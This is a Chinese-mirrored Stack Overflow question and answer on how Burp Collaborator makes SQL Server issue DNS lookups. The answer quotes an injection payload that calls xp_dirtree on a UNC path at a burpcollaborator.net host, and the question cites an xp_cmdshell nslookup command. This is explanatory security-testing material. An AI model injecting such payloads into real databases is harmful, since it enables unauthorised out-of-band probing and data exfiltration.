Burp Collaborator 如何通过 Sql Server 和 T-sql 发送 DNS 查询

【问题标题】:How does Burp Collaborator send a DNS query via Sql Server and T-sqlBurp Collaborator 如何通过 Sql Server 和 T-sql 发送 DNS 查询
【发布时间】:2017-05-05 19:49:28
【问题描述】:

Burp Collaborator 如何通过 t-sql 和 Sql Server 发送 DNS 查询?

https://portswigger.net/burp/help/collaborator.html

我知道您可以在此处提到的 SQL Server 2005 或 2008 上的存储过程中使用例如 exec master..xp_cmdshell 'nslookup intel.com'Dns.GetHostAddresses()https://stackoverflow.com/a/967696/3850405

但是今天没有多少服务器允许xp_cmdshell,这是理所当然的,但这意味着 Burp Collaborator 使用了其他东西。什么?连接只需出站,无需返回任何内容。

【问题讨论】:

    标签: sql-server tsql dns burp


    【解决方案1】:

    找到了答案,exec master.dbo.xp_dirtree。示例:

    ;exec master.dbo.xp_dirtree
'\\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'--

    http://releases.portswigger.net/2015/09/1627.html

    如果您安装了 Burp Suite Professional,您可以通过 Burp -> Burp Collaborator 客户端生成链接,然后轮询结果。

    【讨论】:

      猜你喜欢
      • 2014-11-04
      • 2019-11-23
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      相关资源
      最近更新 更多
      热门标签
      Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode